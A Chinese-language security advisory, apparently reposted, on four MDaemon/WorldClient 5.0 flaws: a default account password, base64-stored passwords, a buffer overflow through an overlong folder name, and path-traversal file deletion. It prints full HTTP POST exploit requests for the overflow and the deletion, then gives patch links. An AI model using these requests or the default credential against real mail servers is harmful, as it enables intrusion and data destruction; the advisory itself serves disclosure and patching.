涉及程序:
WorldClient 和 Mdaemon
描述:
WorldClient 和 Mdaemon的多个漏洞
详细:
WorldClient 和 Mdaemon Pro 5.0允许用户通过任何标准的web浏览器访问他们的e-mail帐号,文件夹,地址薄和拼写检查器(spell checker)。
而且WorldClient出于对旅途中用户的考虑,不象一般的e-mail客户应用程序,它并不要求重新安装以去使用,在Internet终端上也不会留下任何信息的蛛丝马迹。WorldClient是将所有的信息存储在Mdaemon服务器上,而非第三方的服务器。为了信息的敏感性和机密性,针对每一个e-mail用户都有他们自己的帐号和密码。
但不幸的是它们存在多个安全漏洞:
1. 含有缺省密码的缺省帐号.
Mdaemon有一个被应用程序本身使用的叫做Mdaemon的缺省帐号。当尝试着去改变这个帐号的任何设置时,错误就会发生:将MDaemon建立在系统邮件帐号中。它对于系统的处理进程是很关键的,如果不需要就不要轻易地编辑它。当企图使用Mdaemon系统帐号,就好象它是一个规则的邮件帐号时将会导致无法预测的后果。
通过破译密码(就像第二个问题描述的那样),会很容易地发现帐号密码总是“MServer”。
然后攻击者将会使用这个缺省的帐号去进一步挖掘软件中其它漏洞,或简单地作为攻击者的毫无约束的匿名帐号。
网管u家u.bitsCN.com
2.脆弱的口令加密机制.
用户口令缺省存储在一个叫做userlist.dat的文件中(C:\MDaemon\App\userlist.dat)。并且脆弱的口令加密机制(base64 encoded)使得口令文件很容易被解译。
3.WorldClient中的缓冲溢出漏洞
WorldClient中存在一个缓冲溢出漏洞,攻击者可利用此漏洞作为系统运行任意代码。如使用缺省帐号用web接口(worldclient)建立一个长文件名的文件夹(此文件夹名应在1000个字符以上)时,缓冲溢出将会发生,EIP 在0x0123FFA8被重写。需要去注意的是当发送exploit string 时,利用此漏洞的客户端必须被验证,
4. 同一驱动盘符下文件的删除.
当建立一个新的带有附件的电子邮件时,附件被存储在用户的文件夹中。当当新建一个文件时WorldClient会检验文件名十分可能含有像"../"一样的危险字符。但是当删除附件时,就不会检验。这将意味着作为Mdaemon用户的同一个驱动盘符下的任何文件都有可能被删除,将有可能导致拒绝服务攻击。
Exploit Examples.
以下仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负
缓冲溢出攻击实例:
POST /WorldClient.cgi?Session=xxxx&View=Options-Folders&Reload=Yes HTTP/1.1
网管网www.bitscn.com
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Q312461)
Host: victim:3000
Content-Length: 1636
Connection: Keep-Alive
Cookie: User=MDaemon; Lang=en; Theme=Standard; Session=xxxxx
OldFolderParent=&OldFolder=&FolderParent=&Folder=&NewFolder=AAAAAAAAAAAA
AAA[BUFFER_HERE_1000+chars]&NewFolderParent=&Create=Create&Folder%3AInbo
x=Inbox&Folder%3ADrafts=Drafts&Folder%3ASent=Sent&Folder%3ATrash=Trash&F
older%3As=s
文件删除实例:
POST /WorldClient.cgi?Session=xxxx&View=Compose-Attach HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Referer: http://victom.com:3001/WorldClient.cgi?Session=xxxx&View=Options-Folders
Content-Type: multipart/form-data; boundary=---------------------------7d2851b9074c
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Q312461)
网管u家u.bitscn@com
Host: victim:3001
Content-Length: 407
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: User=MDaemon; Lang=en; Theme=Standard; Session=xxxx
-----------------------------7d2851b9074c
Content-Disposition: form-data; name="Attachment"; filename=""
Content-Type: application/octet-stream
-----------------------------7d2851b9074c
Content-Disposition: form-data; name="Attachments"
..\..\test.txt
-----------------------------7d2851b9074c
Content-Disposition: form-data; name="Remove"
Remove
-----------------------------7d2851b9074c--
受影响版本: MDaemon/WorldClient 5.0.5.0 和先前的版本
解决方案:
升级版本(解决了漏洞#1,#3 and #4):
ftp://ftp.altn.com/MDaemon/Release/md506_en.exe - English
ftp://ftp.altn.com/MDaemon/Release/md506_ge.exe - German
作为问题#2的临时解决方案,CNNS建议用户更改密码文件存储位置。
评论加载中…
